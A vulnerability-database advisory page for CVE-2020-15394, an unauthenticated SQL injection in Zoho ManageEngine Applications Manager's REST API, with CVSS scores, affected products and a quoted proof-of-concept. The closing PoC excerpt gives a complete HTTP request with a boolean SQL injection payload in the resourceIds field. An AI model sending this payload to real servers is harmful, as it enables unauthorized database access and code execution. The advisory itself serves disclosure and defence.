9.8
CVSSv3

CVE-2020-15394

Published: 25/09/2020 Updated: 30/09/2020
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

The REST API in Zoho ManageEngine Applications Manager before build 14740 allows an unauthenticated SQL Injection via a crafted request, leading to Remote Code Execution.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

zohocorp manageengine applications manager

zohocorp manageengine applications manager 14.0

Github Repositories

PoC CVE

PoC CVE CVE-2020-15394 DBMS: MSSQL TRUE condition in sql query POST /AppManager/json/ApmAdminServices/checkResourceID HTTP/11 Host: redactedcom Content-Type: application/x-www-form-urlencoded Content-Length: 67 resourceIds=1)+AND+(SELECT+CASE+WHEN+(1=1)+THEN+1+ELSE+1/0+END)=1-- HTTP/11 200 Set-Cookie: JSESSIONID_APM_80=123; Path=/;